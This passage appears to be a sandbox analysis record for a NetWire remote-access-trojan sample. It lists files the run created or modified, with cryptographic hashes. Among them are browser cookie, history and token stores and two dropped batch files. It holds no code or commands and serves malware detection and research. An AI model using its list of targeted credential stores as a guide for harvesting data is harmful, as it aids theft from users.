| SHA256 | 96fe4b64d00a7fcfab5312fa27fa22551d30db3d32f4c8ab6eefe8ad1f087c13 |
| SHA512 | 80d9e0250f6b316fdfd8ac69fd2454507bc32494340140eb2a1dd1bc3782ddf54a39eb0a620aa2306177c072ca7079736d50da819cac9797dac8df7460c8b280 |
C:\Users\Admin\Downloads\NetWire.Dy-8M1Cj.exe.part
| MD5 | 7621f79a7f66c25ad6c636d5248abeb9 |
| SHA1 | 98304e41f82c3aee82213a286abdee9abf79bcce |
| SHA256 | 086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d |
| SHA512 | 59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | bee67512892d25c2327c59d5e79565e5 |
| SHA1 | 0f3f8deab3464d89ac8c528bd057ac34f4fe1afa |
| SHA256 | a5e71074b36fef07b768047291d37b1c42144558a5c70dc77216411d33b2092f |
| SHA512 | 88004fa4a233ad4c3583efe96e9cac22eaacbb7908843dfb0e62bf2b1d3136d40635f5c734db1aa0324d7e96f9f33f8dafe740bdc05240a3840c1e14279f387c |
memory/4136-1708-0x00000000006B0000-0x00000000006B1000-memory.dmp
memory/4136-1707-0x00000000001F0000-0x00000000001F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36f14c6d84591a1b011119ea272806ac |
| SHA1 | eafd311b2466e7e5550bfc99338bebbafb97e44e |
| SHA256 | a843b7834bd9c5ecddbaca0e7e59b1dbe87bdcfef205fc612a436c8d30281046 |
| SHA512 | 30c3167bed3aa166706f38d99a8e9eb803c308f7f67d744cb0a7773b656020b8a90735e18daa34a8de055cce53064f83fb9291fb4bc8e6ed1501a2bf69b73e44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | 74705e5ff4b1cda01be29788105e9d8e |
| SHA1 | 81af9049e3e9ed725cf56a00e144c85a1ada2e61 |
| SHA256 | c843703e7844280f76a983f66d61138efbeb1a31d05cc60c56a9c6405285da5a |
| SHA512 | 9ba031d148581fc6bb8bbe26cd6cd80cda5378249819f339e0b93beb4e2216210d55e89d42f08feda02697a97285f37284b25683d44d09b8b5932775a07dcaf1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | b38c067b214122dcd0a5f78543d35b3a |
| SHA1 | 7515a34e29f424f5ae90e79b4073962b0fe7b93d |
| SHA256 | a953879dbdbec29f61256e03dcaf6190a79d2c71828d3d3a8e573e59dcc03d86 |
| SHA512 | 726131a4aa212df6b39cc8b0644c0b602e8c57e662937ddb003e3ac62e42797dc898029111d7b149f592faf88b7eb98f84fa832a596f48c975558d786cd9b5ae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13369781097354065
| MD5 | adf65232fedc445f47b91ba99a88b765 |
| SHA1 | 47d87004b72d0bbe966b72f4d7d563c0545eda9d |
| SHA256 | f682ab24704e1bdfb057cbeaa100aacf273f3eeefca34899605e2fb14df64de4 |
| SHA512 | 83f2a89fa26771ec9ebf06413961d94a406fe49bb4b72e039774d43a4cf92f9fe86f0b6b611884f20ce82cfe951629213febcf5ea172961d862f3ce84c966ca4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 31c26a7966b70b621010abee1fd966ba |
| SHA1 | 8a59b6b698cd38c8022a344e1e03f6cb4e9df3d8 |
| SHA256 | 5f3270c5a262c56262ea22e5b70fe7bd897f8d7a1c8c3a2615336085fe43d16b |
| SHA512 | 05469bdb2fabb3b9fb6cf9b64306f4f048045e06c2aefb426f5392b90c7cbd37824ef7e6389defca1cd082fe382a9916e453ce4d34e30adbbee104ef30cc12eb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 6f0d7b9cd614ff31282b19a6df0c9f00 |
| SHA1 | 67e1dca4eef4ab63ae3aae3063f41366b5fee194 |
| SHA256 | ff6210614471d2db328ae6112f86789f2df0de510f083a1c79cc6a14415e3376 |
| SHA512 | e044ce687ffb6675fd9fbdb461036fdcd1580539ff0b79d76b9edab9ba788f95afd8e14021872ef269b2e7d1c22e4c88845217285f86e7248269bfbc0e766798 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | dc5b0c0b2d9b0387e8e8a0997c5f9b4b |
| SHA1 | 61b579bd89f249f788e3f1c3f0dfd8687f4f1707 |
| SHA256 | 9f28e468ccf0a835598e2bb88f7c5fa802de863fc3c938b5a9ea2ea4f673145b |
| SHA512 | 3decffbd422957324be4228c6c711c2bd37c08e99501ce1c4d5e40e1cca65d5ca093fed46763404ff08ada24df6d2ae6481812ec4e551282305278e570c82cbb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | 74838bb5887a2a24e85c50e3b6c901eb |
| SHA1 | 7f7b351d1423ea000d68c8bc312a7ee01b0cde86 |
| SHA256 | c3fa5355a2bb5bdb792d099d3e3395da3c6f2c1fb657c402ff7be7bab0a3d223 |
| SHA512 | 544594665ea2da364f5ac4dcafeec536b5583be7b9b921c7f9c430aa5ad2600ce4143792e6e9a4e5230ea2aa250a74faca2cdabbc2dd2dc3bfafb819834a109e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | 9085a547ceceec1e930593cdbeec2368 |
| SHA1 | f0a5e13be297236e264b2623215212ef5459765c |
| SHA256 | dc28e599a508e7b37294fd065189b4294e4de58bdfcf6c439ad2ea0801db7174 |
| SHA512 | 9af13aa4249e04b74d2f94aec2cee3bdd478b2fe4d11391d674cd74d2d3e35b410127e1c57f164412a382ea2ea65aab7c624e7f3c18ef1ffceaa7ce186af415a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | d4217239538faed06ce59c69c876931f |
| SHA1 | 4607f6e8ffd4a97f3509467d31c371e5928a27b9 |
| SHA256 | b7eff619f694de950fe92e8739c129db57483eb8d2c812948013978df7d41fbe |
| SHA512 | 9a2efaa988a65b0537df29d979a5806041806b52ed988b597198a43077d2283acfac3c52b4c892953186eca740f0fec9429b85c6fd0d94b2c588fbec7b139414 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | bdaf197e87a1196b6939db13ae160f69 |
| SHA1 | 4e21a08d33d4e5499ebe5a7456c8d9049798bb29 |
| SHA256 | cda7e220f03ac2fc61da28fd180a9c0462733a4fd3076de4fc05a6f8fb0a04f6 |
| SHA512 | e49ae164bba5f0bf5aeb4be3e58033e52fbc19f7e11bb33fc32799e5f08094b45df5d282415ba7eaedaeccbca4f99f2b3d86f8fcd078b868ef427ebc164e7e0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | 9f77123d34918a600b63a3864bd05445 |
| SHA1 | 8aa21fe349c51fe8cb4202ff4188c951949f9bcd |
| SHA256 | 844e4ddc1bd85923671e94206001837d7883cd3ea7042c8d2dee4498e7bbf878 |
| SHA512 | 702dc8a58fe075d9f6d49ba5d825aa8c6a7b2131e606548560514761ed1e288e3a618ea4f5ffa3fbcbc63eba3d7fc317c5d073e13af087bd74a2aed486b8c48d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | a48763b50473dbd0a0922258703d673e |
| SHA1 | 5a3572629bcdf5586d79823b6ddbf3d9736aa251 |
| SHA256 | 9bb14ea03c24f4c3543b22a8b4e9d306b926d4950cfcc410808ecac2407409fd |
| SHA512 | 536406435e35f8204ce6d3b64850ffb656813aacbc5172af895c16c4f183005d69999c4f48f948875d9837890f290b51a7358ff974fb1efc6ba3d1592426cca1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 84ab273a45ad3de544d8a3168bc2a3f7 |
| SHA1 | 19d3fd43c79bbcfd99087c4001ca109d76416459 |
| SHA256 | 0073b36db72c9c52f98d923206fb2d2d4c85811b88fcfb51477d2261f309036b |
| SHA512 | 167cfa1a82a3f56002d2cb3de1c085b024c7ad3f4ad363ac3f9901a4c39d102df5f6df10d17345f9b62edd906a2d874056a84cf3cb8aa98248b4469b50fad111 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
| MD5 | ff12f922900306103efcbf60b9b5ce38 |
| SHA1 | 9c1d4a663f377e6298ed26fc2d2c755076f3b130 |
| SHA256 | 3be4effe393370aa267a4ca068c0206f529b34690079dec5a5959037ab0ed8a2 |
| SHA512 | 302855dfcc098cb6cc6aaac7db9954f3e09af307f69658bd48a03cbeab01e3df81600787300c8d966c8b21553e1a833550c2ae13e60376a62c7b541198efd21d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2
| MD5 | 3edc820a2a762b4194a0420d6025404f |
| SHA1 | 0df4352a9f7057e1156a91f5e87ef8a8101b54a9 |
| SHA256 | aff22690e8b806a912303843914e231279848c8130865ac9c0af0557ee08cf29 |
| SHA512 | 83c0e869ffdf2bf6cdb1cd9c5b5cf76314fbe6b7d17cad8ec6219b16bbe7b89e4edd9d39ae6bd456996feebd04b74e3f798c742889fc03e26bdf0103992e1f08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | e5d3dbc42901d9fcbfc877dcf1161941 |
| SHA1 | 17c05939bfdf1f3da5cbe1740c5f0fb955267f13 |
| SHA256 | d9bffcfe62046ea035e738aff25bee4da0f52cf25df22996cb4deb742a5a47f3 |
| SHA512 | a3ba36b03a135c8baaa9568f8ec6f0fb08c10c8a0ba82265cea3df5705baafdc83d7acec8fece1aa70d74b1ba81b4586fd0dc2d482a6892a3018d469e984f48c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | d8687026cb8b9e207e35e80686593d70 |
| SHA1 | db14958caf21eb8ff421a43dadf0d8590c2b3e09 |
| SHA256 | 984e0e8b2ff6b9c3f8d28d3e139d1c01b2986235c2af0dfa4afbe279e4ccb2f8 |
| SHA512 | 58b20dbb39b39976657cfd20d1a02b590727afb4dba969acaea68423fa79adf7d18d4941b51c24e7230e0cbbdea845089c1efc7d0137f8c9ada46805d0946b87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | a55901dd8dfaa9b8168ab67510e8fff1 |
| SHA1 | 305d79008b89437697d6ae9e53b002f2919d0da3 |
| SHA256 | ec41b1a26c7ff7712fc566e5a9bba6d632be2d7748f9898b26b4d794b8d3769d |
| SHA512 | e90bdaa843ab16d2c95304db36527fb21b163af574df28b16c7a8309c179dda638a91934c969c40e35042bb9d8fac3b78a15a08dd384c1c9dd1934e6aa50028c |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
| MD5 | 2e9ca1e942d4dba19b61b1fc40341077 |
| SHA1 | da1d3dcec06c4ad00e10b4c996b962aa41c44e77 |
| SHA256 | 732c30614c0d77445a5c96aea80a2ca534c66147696806a86c409e1cf2a998f0 |
| SHA512 | 3b6aa465c89ffdde0136f62ece4cca36fd50a35b69bb0b5d5f8ddb04c6e4271331d70d490a1ab2a9a46f7844ff23231f4c8a3c9d1e052258409199be57233cbe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | ff815d07a20ce2c27d0fc8e4a899d895 |
| SHA1 | bad6ffdebe7bdfadefa6a070e819d70d2c514ed2 |
| SHA256 | 5e070200a6756ae3bcb42c48a6f9b4b7605206ded00bcb3b747b085e0ebd4f96 |
| SHA512 | 35929cad8f297e1d891275727cb0245f321d62ba0465584e22bb47ce7958f07e8b013ce0415ab665da2cfeecec582000d24071205ba49e77e6c9fe3e649c6d00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | 5d2bdd74dd3c6a1185e6ee6ed37bcdbe |
| SHA1 | a8b097b43ccc1519fa85bb56ddd44319add1247f |
| SHA256 | 0ff99b1fc705985adfce3140a2acac602111e1770b5c944383e6bb278b0ab131 |
| SHA512 | 30320cc6ad60c373fd050bcd584875562c8d46561e4b96608bea760a38d14a6379c9c65f36469f105877fba91867444a2aca46ab5b7d4a142d2cdf3ee84b8554 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e437443e33401530fd2bb2a6d4d1cfcc |
| SHA1 | 2b747ff379fc0fdf9e69e57f3a22a24aa045309b |
| SHA256 | 26510431bbe1fe82874e64fcc47d54c4913aefb195af655777d52c0fa8cd73a7 |
| SHA512 | 60df58eff881a528951840023eda13ab105e44a4803da46f7907d76cffebc9afa366b09e8b3d4bef9bab08cbdbb1ff1f16e0de5c879a2c313c6e4a6e657c2fc7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | 78fb09d2d0848d3f80cba3662f97c728 |
| SHA1 | cc2f3f93cdae9bbb49687eba6e47a7b0391f332b |
| SHA256 | 7d67e0907be6d7aa656046e2ad87f83f7f45ab509cd388ea8427561d65d8b5ec |
| SHA512 | 7dd00b186940fece14fa0e1da3136edc56f0aeb95ed550dc4b50943845921b5553f752884b8324a6475de8511bea0fd549cf48a126f2dd729af9ac4976810842 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
| MD5 | 5c9e400732af2d78844ddf62582c31fb |
| SHA1 | 064f566a5e4565e0b2a0103bb57761306b4bd2bf |
| SHA256 | ace4d063892b9d9e89366a58883647247f6ba3879236f050c689e9e2a353c407 |
| SHA512 | 07f6643eea48a0bfbafeefbd9fec4a40348c4d1c434c11d2772470ddbba6ca7f5244150ef15b0bcbd646421ada21f32ee8db0e983d4ab6068c682de5e20388b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | dbe46f82a661d0ad699e8e7e742e72ee |
| SHA1 | 4dde6bc2ec575d4411eaf2fc19a13597f3cdfe87 |
| SHA256 | a9613834feb68bc16aee4ec20a98adbc19aef47e94d3af5409203cf965dc003d |
| SHA512 | a1557deb1a906a2d82b0d821fb6a777cbba9ba87b4ca240dff8bd24aa5685d22b47b06810a103c7587e23183e985b7c5b1f83ab55fd417017da361530e69f305 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL
| MD5 | 59896fd7ceb2d0b3d30236213c84de48 |
| SHA1 | ab4d5da50ae0049ffe8a0a4dca7f1b4f1f29798d |
| SHA256 | 050e86e81a1a96a02fba4179f26e02170395a109038f4199add3e1383f9310bd |
| SHA512 | ddff25e936077c0ace8d44da03831cd124d29e1673a9d61854559f4585066a47bc99980f61289eb826cf691bad64e88b00c951b4cd3b20f0d3bcd23cfa918431 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
| MD5 | 58aa3847aa926172fc4c1799c932bc69 |
| SHA1 | 90a876b4ce36e6f3da32405ae0d3587f47abbe3a |
| SHA256 | d09edcab593b65ef3fcb64b6db35aeff3754589caed2b6094ff67de4d0e67b43 |
| SHA512 | c8f9564249b4b949901a2657319d230af3ffdcda1225b39573e5867f7dbd3758be799addd028fc86f49cc68b4b673950f2c917ad8ad65fefb0993208ab23b51a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 9a7827bffdcef0a88526e20b1ab1f265 |
| SHA1 | 0c361ebd8872968df4fd4e666b396daa7ab8759f |
| SHA256 | 6176e658808269ea3a0ec2032c64af22b311f91883c16cf36964eb94433a79d2 |
| SHA512 | fc3bd6d50f87090866b87a554851e7e882e57c3fc47cb2b4362c6ecc5119d5ecacf7ad7806cfa2e89b5a5ad7283ea63f84b1b3b79c3f9f51336d200879307666 |
C:\Users\Public\Natso.bat
| MD5 | 5cc1682955fd9f5800a8f1530c9a4334 |
| SHA1 | e09b6a4d729f2f4760ee42520ec30c3192c85548 |
| SHA256 | 5562cc607d2f698327efacc4a21bd079bb14a99b03e7a01b3c67f8440e341cb3 |
| SHA512 | 80767263aad44c739236161d4338d5dd8b0b58613f22cd173c3e88ebf143220ee56bbf93ace69a07d3c2f00daff0adbaa8461a1d53d12699725395c931c43cb6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13369781097142065
| MD5 | 1f52ce8211162679ee4da34e02028149 |
| SHA1 | aaca69be7adc406ce67477456811378a2afc1471 |
| SHA256 | 24b717a2c72bfd719b811488154e2c7b00c4b7678d1a5ba77bcb1bf0ca3feacd |
| SHA512 | f09df99a0f9f414122b5fe674130002eba614365032df1690d58e6aa35cc6deac113f184267d5bde2a3dd3d9298cf26b15d07058fcfca9a6136ee00ef9f56303 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d
| MD5 | e7226392c938e4e604d2175eb9f43ca1 |
| SHA1 | 2098293f39aa0bcdd62e718f9212d9062fa283ab |
| SHA256 | d46ec08b6c29c4ca56cecbf73149cc66ebd902197590fe28cd65dad52a08c4e1 |
| SHA512 | 63a4b99101c790d40a813db9e0d5fde21a64ccaf60a6009ead027920dbbdb52cc262af829e5c4140f3702a559c7ac46efa89622d76d45b4b49a9ce01625ef145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | 4bc52bd19776147d5f22e62338342f97 |
| SHA1 | 8659be7737b0420a6eb7cd343c138d68ab448002 |
| SHA256 | 8d436080ffd8cacb719c6a664522b35d4f557b2b344698260cfefa8fc90a63f9 |
| SHA512 | 08a5783fa2fbcb084997b51aae1ba6ed7f09f9c9026af6b598a555b99ec52c656f29038d6b396a6f5d88f969ea74d9aabeb8f628c4b36cc40f5ff85161bcb886 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin
| MD5 | 3ac6d9bc8b4791d16e96cd17a19a9337 |
| SHA1 | a208d093c8599a585ef3de86ade9b8f967409568 |
| SHA256 | d31acaf23b074250a54400b6b1ffb7fd7db66610257b9d9c3ea0c05586ebcc18 |
| SHA512 | 20a4d336e2b27e427237addfecb921ecee79caa2580befc50f8c4decc60de8d472e255ac3cd26cd1b34200186c80adffd089f6547410b8b527d05c286179333f |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\56967B0DD89ED4520DEA6B6B147403FB33151B28
| MD5 | d639a48f38b9c4ddc5fa9983567dca17 |
| SHA1 | f1edf740d83742bababb029ff7b009ff49ea8fd0 |
| SHA256 | 13b51e8e7eb0a99f18af576d9d75c38d7577436f7e57926296d005ef6c6022e7 |
| SHA512 | 4f6bd9175faf2e8201d612485f603123f37803cc14da4547709393d530d003ad116d091bf9099854a7cf62d09726f64db12d261ec3b59e6cdccdfe9a14ae1b8f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0b1a86a5796d156b1736543c32252051 |
| SHA1 | 6164b5c98e61173ee069fbb239c2e69f47ee7b22 |
| SHA256 | b8c12388ae97777b81cbd34401a6d2f95da16dcdf703f86937430a6c4020e5bc |
| SHA512 | 1f8d1d11a3e1ab378eecb32ea6472cf456fc42ad1b0227bdca3b194ab1de61be219cd7eb50e4a72fb158eda582a99fee31632b2a04c9330b5c9b92f108c8c821 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 082bc6e596f4c57cee9d4410a40ed469 |
| SHA1 | b3707359e69eea7afdb61ad1968f59e9b9fa41a7 |
| SHA256 | 3972649030e625b1eac6cab10f66863f619d968ea003631416855ea8f0418f93 |
| SHA512 | bade41b3c1529ac72743515c8c2338075fb4a098d78a4b717ef07eb6c554b65b5f488a15d9bf52a23478211226a22f398e4c372a290e7541abdf50b87b00c61b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 294fa21319d84ee988222b5f5c168244 |
| SHA1 | 5c50f926e6e97c0ba422206ff10778cffa487a2a |
| SHA256 | 8f466b6b254ac9aaf9ec5efd556479fc9fd095d2e77cbb4037c1419584133e15 |
| SHA512 | 56b669ffbeab0235c4883914bd421e6e87f95d618304324be8138da0189ebc5f5d78f9e6c28bfff7e354c2f25138979a1465ba397c8a3a07f300213b7ffd6e01 |
C:\Users\Public\Runex.bat
| MD5 | f6828e22e6abe87c624e4683fac5889b |
| SHA1 | b93d63354d4ddb226dab90955576a6d2cad05ba0 |
| SHA256 | e1b1884353a51436f90dfed9f85ed9dd98fccfbd13dee7aa54fd901f77fe5e9c |
| SHA512 | 26afb36afcb3f286b85ebd72061e26f84c33075d3d0767cc93f50ec414a85838c86049e0c56ff43011d1a309b98ae355cbe412203429ac243010dc971ac81ec1 |
memory/7468-4922-0x00000177B2B40000-0x00000177B2B62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sif0exi0.nad.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 082e48312cf2a6c0020bb6e3467e1d5c |
| SHA1 | a17cf645e30fd5618cb1e0af3abe55ef07510320 |
| SHA256 | d6667fa247169010d7295c49d8e67240c8108cde0c122c4b19c2987a20b6555f |
| SHA512 | 84e41262ff4ff0a03a65e372064639060d6561754e9b906106abe23aaf5e053310c6b65eab59a2462bf54259762c2d7d930e61a568503dd5aa57c469a2f6a582 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c85de9ed7c58ffbe555a125abfd91e10 |
| SHA1 | 855eb4506dab08826cd1cd43d1b28659433c333e |
| SHA256 | cb0525922f6364ea7301d23d47262cc78783e6d43db551b7bc9b81025445bf8f |
| SHA512 | 5cd792562ed1307ad6f1edae6f7208b50454f41edfd91eee8be216153e2fe4c0f2830da8a0f37a68a0c175fb6fc558aba9f68a38150fd755433572ff434458bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5c9c76.TMP
| MD5 | 36821d47118c63ab453a75a6ff5e61bf |
| SHA1 | 73ed8e0480eaa738fc5a7fce8731e985059fb85c |
| SHA256 | 5cd6491354f2cc434ca1b04e63ddcec3bfc0a4f8d9e17fe854ee2552ca222aee |
| SHA512 | e040a764dc4c55973b6bcc36f3fb108e7c741d14f7131fa16256f7a12050a4ff6f4f82d2493507648e15cc37b4ee48bfba8c20a368895ed9245ccbdef6254971 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 8c4b6838b01af726d1c7e87326f1b2b0 |
| SHA1 | 1bc99bd94d1850a65d30eea8cda70e7d44c0452e |
| SHA256 | 5ad1d35ebc83e74301899f3a46cf3f97c01ef86018a91c798ea97d58194e512d |
| SHA512 | 328a7ffb9f8f1949e5beb592f4436a576562986b941f4e4d6365261f1b22ecaded6638ac1c5c5b30cfbf53b5c6ff45f51e3282df39b0bc8d5ca4c68088f006bf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | a22270dadd552150ad6d2c1ada96c42a |
| SHA1 | 986df75cef4b025e792da7db4d697847d0b94e68 |
| SHA256 | 52e6ee938921cf95b3ba89c94b3e570420f888ac3273d0fe1d3c6e6ce97bc49b |
| SHA512 | b09bbf530b770a2f262eadeb05070dfaff10bdf90387c6ce030e7556f3a6e67a2055741c2e94b02e779b68e8dca6020a977873f3cfcbbaeff794848482e6dab6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | cc49c61ed0c5d2a1de1a487e6a981e9a |
| SHA1 | 428e2c0b2ca5a74f8c5ea2338b06525fada815f2 |
| SHA256 | e493180e0d6d72ee8179f239c658c6617e016c77a8d7ed30653af697fbc9831d |
| SHA512 | b1e989a10d06c15674ebdf465075bb9e30239cadec5d544fdc3c086f03ee6403dc4036e72c8c16e5ebb08d98021ebd8ff9410b6b57d259e5b509f83628d30db9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 037d20e3029495d12924a43549aeb26a |
| SHA1 | abc2009ab2f960d08a38debb38bc06598d72cbf7 |
| SHA256 | 60d986d7f90e7c830faf283974fd871a9e2eb795cf6ca1d15d9e4140e20043b2 |
| SHA512 | 30136804d93a8ad8dfe8375240c2491933ffecc87e0e44404181f32a34a360400f0b3d5b497b47905b6d4b13ed78ca6ac8f673a03dab6e66341cbf4a62d3b44c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\7F439C9D3207370328EB4A4F1AC09F1A849BD46D
| MD5 | 2d944828205cfca779315abf82c9b900 |
| SHA1 | b053524b71e3e596b34683c014895af563d074a7 |
| SHA256 | 584328c8d9e52b809c1151adff5e2eef036e831132ee1625f829a6e544fa7a15 |
| SHA512 | 2bddbcdd33e84c18cc5db35f32a991287e6a2b6fd651c4c1f79280d6f13fcb1bd46152cd1163bdc39a6f12c372e6f5c234faf8dad189a15c6fceadbd4f5ff51d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\5C2A2B940E0EC346270C250EBD62F95402CF3D0B
| MD5 | 5ac31bc851ab4949ad04964a2977a7c0 |
| SHA1 | 5ac904a935ba52985ed2f4ffa6692399271b3df0 |
| SHA256 | 7c16a059154f84b72d131bc33d4ab1249c76d4c648cf0e5a8bfe7700bd12a14e |
| SHA512 | a6af779bbcfd6c831c2d3d59e891c4e298c238f85d5fad3adc1e307b93d0bc73f42176d10b0e2351cf3c412857019b2eaa7cf1b2759fb2a69e35c8110edbb8a7 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\C9A19F720C659128631F28B59E979F9CAB42A166
| MD5 | 3f2b950f12795fbc8abd4214f3fc3a7d |
| SHA1 | c23b14d422237cb54b133bd26bf4552fb3e72d0b |
| SHA256 | d34f907f5063832a16c77a470642fe8ee524e67d88257e667ce634e6405b8d8b |
| SHA512 | bfac7a5f428f4827f7847ce8f857ed3b2f59417f3423acd5c32fb020096c92131d45a4d0599ce163bbcaa1edc20843aacd0b8132e15b9c4d9f140070be757a06 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\4CD1E24439AE7E1E453F9A13A8B1BEF76E52CAE8
| MD5 | 67d8f3e75e9cd3360273b6f974292d2e |
| SHA1 | e6d73ad87249a91b3f28aa4ea28c4472003e74e6 |
| SHA256 | 20ad8fe48f4847a6d448d51ae3e0ae80301f0cd41d5150ab0b8a91c389b04c92 |
| SHA512 | 0234ad05ece4be4172676fdd8d628adff4ff3bcb91cc61c090f688920d70396aa7cdd378928b97eada148bfc3fa76d54581bb4285aa3afa1e2925f914106ccba |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bxumog7h.default-release\cache2\entries\33809CDBDD69269236BB05F66DFF2693F384205C
| MD5 | 04bd1f969243d3ebb29dfff242187061 |
